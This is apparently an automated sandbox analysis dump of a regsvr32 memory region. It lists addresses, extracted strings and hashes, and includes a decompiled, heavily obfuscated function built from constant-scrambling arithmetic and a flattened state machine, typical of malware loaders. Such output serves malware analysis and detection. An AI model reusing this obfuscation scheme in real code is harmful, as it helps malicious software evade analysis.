0x04b39bd6
0x04b39bd8
0x00000000
0x00000000
0x04b39bde
0x00000000
0x04b39bde
0x04b39b29
0x04b39b61
0x04b39b68
0x04b39bbc
0x04b39bbc
0x00000000
0x04b39bbc
0x04b39b95
0x04b39b9a
0x04b39b9d
0x04b39ba4
0x04b39bb7
0x00000000
0x04b39ba6
0x04b39ba6
0x00000000
0x04b39ba6
0x04b39ba4
0x04b39b31
0x00000000
0x04b39b37
0x04b39b50
0x04b39b57
0x00000000
0x04b39b57
0x04b39f21
0x04b39f21
0x04b39f27
0x04b3a137
0x04b3a13d
0x04b3a284
0x04b3a28a
0x04b3a3af
0x04b3a3b4
0x00000000
0x04b3a3b4
0x04b3a290
0x04b3a296
0x04b3a399
0x04b3a39e
0x00000000
0x04b3a39e
0x04b3a29c
0x04b3a2a2
0x04b3a2db
0x04b3a2fd
0x04b3a319
0x04b3a325
0x04b3a33b
0x04b3a356
0x04b3a381
0x04b3a386
0x04b3a386
0x00000000
0x04b3a2a2
0x04b3a143
0x04b3a27a
0x00000000
0x04b3a27a
0x04b3a149
0x04b3a14f
0x04b3a1dd
0x04b3a1e2
0x04b3a1e7
0x04b3a1ea
0x04b3a1ec
0x04b3a1f4
0x04b3a1fb
0x04b3a1fd
0x04b3a218
0x04b3a219
0x04b3a22a
0x04b3a22c
0x04b3a22f
0x04b3a22f
0x04b3a236
0x04b3a239
0x04b3a254
0x04b3a255
0x04b3a264
0x04b3a269
0x04b3a26c
0x04b3a26c
0x04b3a1ee
0x04b3a1ee
0x04b3a1ee
0x04b3a26e
0x04b3a270
0x00000000
0x04b3a270
0x04b3a151
0x04b3a153
0x04b3a1b4
0x04b3a1b9
0x04b3a1ba
0x00000000
0x04b3a1ba
0x04b3a155
0x04b3a15b
0x04b3a18c
0x04b3a191
0x04b3a198
0x00000000
0x04b3a198
0x04b3a15d
0x04b3a163
0x00000000
0x00000000
0x04b3a169
0x04b3a170
0x04b3a172
0x00000000
0x04b3a172
0x04b39f2d
0x04b3a121
0x04b3a126
0x04b3a12d
0x00000000
0x04b3a12d
0x04b39f33
0x04b39f39
0x04b39fd2
0x04b39fd8
0x04b3a106
0x04b3a10b
0x04b3a10d
0x00000000
0x00000000
0x04b3a113
0x00000000
0x04b3a113
0x04b39fde
0x04b39fe4
0x04b3a0e4
0x04b3a0e9
0x04b3a0eb
0x00000000
0x00000000
0x04b3a0f1
0x00000000
0x04b3a0f1
0x04b39fea
0x04b39ff0
0x04b3a066
0x04b3a06d
0x04b3a072
0x04b3a075
0x04b3a077
0x04b3a0b0
0x04b3a0b7
0x04b3a0ba
0x04b3a0c6
0x04b3a0c8
0x04b3a0d3
0x04b3a0d3
0x00000000
0x04b3a0d3
0x04b3a0ca
0x04b3a0cd
0x04b39f85
0x04b39f85
0x00000000
0x04b39f85
0x00000000
0x04b3a0cd
0x04b3a0bc
0x00000000
0x04b3a0bc
0x04b3a08f
0x04b3a090
0x04b3a09f
0x04b3a0a4
0x04b3a0a7
0x04b3a0a9
0x00000000
0x04b3a0a9
0x04b39ff2
0x04b39ff8
0x00000000
0x00000000
0x04b3a00c
0x04b3a015
0x04b3a029
0x04b3a02a
0x04b3a039
0x04b3a03e
0x04b3a041
0x00000000
0x04b3a041
0x04b39f3f
0x04b39fc3
0x04b39fc8
0x00000000
0x04b39fc8
0x04b39f41
0x04b39f47
0x04b3a401
0x00000000
0x04b3a401
0x04b39f4d
0x04b39f53
0x04b39fb0
0x04b39fb5
0x00000000
0x04b39fb5
0x04b39f55
0x04b39f5b
0x04b39f9a
0x04b39f9f
0x00000000
0x04b39f9f
0x04b39f5d
0x04b39f63
0x00000000
0x00000000
0x04b39f70
0x04b39f75
0x04b39f77
0x04b39f80
0x04b39f80
0x00000000
0x04b39f77
0x04b3a3b9
0x04b3a3b9
0x00000000

Strings

Jvmw, xrefs: 04B38BDD
Q2N, xrefs: 04B38DC3
;w, xrefs: 04B38B19
|V, xrefs: 04B38D29
Reo, xrefs: 04B392FD
C", xrefs: 04B3878A
AW, xrefs: 04B39A55
C", xrefs: 04B38CBD
t, xrefs: 04B393E3
s2O, xrefs: 04B39953
BO6, xrefs: 04B399BF
+>, xrefs: 04B39861
XG, xrefs: 04B38FFA
/1, xrefs: 04B393BB
08s%, xrefs: 04B3865A
L}, xrefs: 04B39139
LNe, xrefs: 04B391B9
"{6, xrefs: 04B39471
E, xrefs: 04B38CF8
_1, xrefs: 04B39781
jmI, xrefs: 04B38FAF
t0+, xrefs: 04B3879F
W?n, xrefs: 04B38BF8
Uj`, xrefs: 04B394FA
F, xrefs: 04B390E0
.MZ, xrefs: 04B396D6
Kx!, xrefs: 04B3997B
S, xrefs: 04B3A185
3}, xrefs: 04B39789
Tvs, xrefs: 04B38C30
C, xrefs: 04B39734

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
API String ID: 0-3734606162
Opcode ID: bf964c0842826536651a34e6d82138d135f613d33cbecfa11e415c53d9b3eb34
Instruction ID: 086c355f5f0e70f1442c97d2e0f22f6b0be6035101a0126dee006249a10bc02c
Opcode Fuzzy Hash: bf964c0842826536651a34e6d82138d135f613d33cbecfa11e415c53d9b3eb34
Instruction Fuzzy Hash: 71E211B19083818BD378CF25C58AADFBBE1BBC5308F10895DE5D996260DBB09949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B3A871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B3A871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E04B51F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							L04B52B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E04B4E1F8(0x4b319bc, _v2684, __eflags);
								E04B544AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E04B4FECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E04B485FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E04B50DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E04B409DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										L04B3BAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E04B52D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0x4b3188c,  &_v2604,  &_v2084, E04B4E1F8(0x4b3188c, _v2640, __eflags));
										E04B4FECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E04B3BFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E04B51538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = L04B52B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = L04B50A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E04B4D8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E04B31A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E04B40CF9();
									_t758 = E04B400C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
									_t743 = E04B3F726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

0x04b3a871
0x04b3a877
0x04b3a881
0x04b3a889
0x04b3a894
0x04b3a89f
0x04b3a8aa
0x04b3a8b5
0x04b3a8c0
0x04b3a8cb
0x04b3a8d6
0x04b3a8e1
0x04b3a8ec
0x04b3a8f7
0x04b3a902
0x04b3a90d
0x04b3a918
0x04b3a923
0x04b3a92b
0x04b3a938
0x04b3a93c
0x04b3a943
0x04b3a94a
0x04b3a94d
0x04b3a951
0x04b3a959
0x04b3a96f
0x04b3a976
0x04b3a981
0x04b3a98c
0x04b3a997
0x04b3a99f
0x04b3a9aa
0x04b3a9bc
0x04b3a9c1
0x04b3a9ca
0x04b3a9d5
0x04b3a9e0
0x04b3a9e8
0x04b3a9f0
0x04b3a9f8
0x04b3aa00
0x04b3aa08
0x04b3aa0d
0x04b3aa17
0x04b3aa18
0x04b3aa1c
0x04b3aa24
0x04b3aa2c
0x04b3aa34
0x04b3aa39
0x04b3aa41
0x04b3aa49
0x04b3aa54
0x04b3aa5f
0x04b3aa6a
0x04b3aa72
0x04b3aa80
0x04b3aa84
0x04b3aa8c
0x04b3aa97
0x04b3aaad
0x04b3aab2
0x04b3aabb
0x04b3aac6
0x04b3aad8
0x04b3aadd
0x04b3aae6
0x04b3aaf1
0x04b3aafc
0x04b3ab04
0x04b3ab0c
0x04b3ab17
0x04b3ab23
0x04b3ab28
0x04b3ab2e
0x04b3ab3b
0x04b3ab3c
0x04b3ab40
0x04b3ab48
0x04b3ab55
0x04b3ab59
0x04b3ab61
0x04b3ab66
0x04b3ab6e
0x04b3ab79
0x04b3ab84
0x04b3ab8f
0x04b3ab97
0x04b3ab9f
0x04b3aba4
0x04b3abac
0x04b3abbf
0x04b3abc6
0x04b3abd1
0x04b3abd9
0x04b3abde
0x04b3abe6
0x04b3abea
0x04b3abf2
0x04b3abfd
0x04b3ac08
0x04b3ac13
0x04b3ac27
0x04b3ac2e
0x04b3ac39
0x04b3ac44
0x04b3ac4c
0x04b3ac59
0x04b3ac5d
0x04b3ac65
0x04b3ac70
0x04b3ac7b
0x04b3ac86
0x04b3ac91
0x04b3ac99
0x04b3aca1
0x04b3acab
0x04b3acaf
0x04b3acb7
0x04b3acc2
0x04b3accd
0x04b3acd8
0x04b3ace9
0x04b3acec
0x04b3acf0
0x04b3acf5
0x04b3acfd
0x04b3ad05
0x04b3ad10
0x04b3ad1b
0x04b3ad26
0x04b3ad31
0x04b3ad3c
0x04b3ad47
0x04b3ad52
0x04b3ad5d
0x04b3ad68
0x04b3ad7b
0x04b3ad82
0x04b3ad8d
0x04b3ad95
0x04b3ad9d
0x04b3ada5
0x04b3adaa
0x04b3adb2
0x04b3adba
0x04b3adc2
0x04b3adca
0x04b3add2
0x04b3ade8
0x04b3adf7
0x04b3adfa
0x04b3ae01
0x04b3ae0c
0x04b3ae14
0x04b3ae19
0x04b3ae21
0x04b3ae29
0x04b3ae34
0x04b3ae3f
0x04b3ae4a
0x04b3ae55
0x04b3ae5d
0x04b3ae6a
0x04b3ae6e
0x04b3ae76
0x04b3ae89
0x04b3ae90
0x04b3ae9b
0x04b3aeae
0x04b3aebd
0x04b3aec4
0x04b3aecf
0x04b3aeda
0x04b3aee5
0x04b3aef0
0x04b3af04
0x04b3af0b
0x04b3af16
0x04b3af21
0x04b3af2c
0x04b3af37
0x04b3af42
0x04b3af57
0x04b3af65
0x04b3af6a
0x04b3af73
0x04b3af7e
0x04b3af89
0x04b3af91
0x04b3af9c
0x04b3afa8
0x04b3afad
0x04b3afb3
0x04b3afbb
0x04b3afc3
0x04b3afcb
0x04b3afdd
0x04b3afe0
0x04b3afe7
0x04b3aff2
0x04b3affd
0x04b3b010
0x04b3b017
0x04b3b022
0x04b3b02d
0x04b3b035
0x04b3b040
0x04b3b04b
0x04b3b058
0x04b3b05c
0x04b3b064
0x04b3b069
0x04b3b071
0x04b3b079
0x04b3b086
0x04b3b08a
0x04b3b08f
0x04b3b097
0x04b3b09f
0x04b3b0a7
0x04b3b0af
0x04b3b0b7
0x04b3b0c2
0x04b3b0ca
0x04b3b0d5
0x04b3b0e0
0x04b3b0e8
0x04b3b0f3
0x04b3b0fe
0x04b3b10e
0x04b3b115
0x04b3b120
0x04b3b133
0x04b3b13a
0x04b3b142
0x04b3b14d
0x04b3b155
0x04b3b159
0x04b3b161
0x04b3b169
0x04b3b171
0x04b3b176
0x04b3b17e
0x04b3b186
0x04b3b191
0x04b3b19c
0x04b3b1a7
0x04b3b1b4
0x04b3b1b8
0x04b3b1c0
0x04b3b1ca
0x04b3b1d8
0x04b3b1dd
0x04b3b1e3
0x04b3b1eb
0x04b3b1f3
0x04b3b1fe
0x04b3b209
0x04b3b214
0x04b3b21f
0x04b3b22a
0x04b3b235
0x04b3b240
0x04b3b24b
0x04b3b253
0x04b3b25e
0x04b3b270
0x04b3b275
0x04b3b27e
0x04b3b289
0x04b3b294
0x04b3b2a6
0x04b3b2ab
0x04b3b2bc
0x04b3b2bf
0x04b3b2c6
0x04b3b2d1
0x04b3b2e4
0x04b3b2eb
0x04b3b2f6
0x04b3b301
0x04b3b309
0x04b3b314
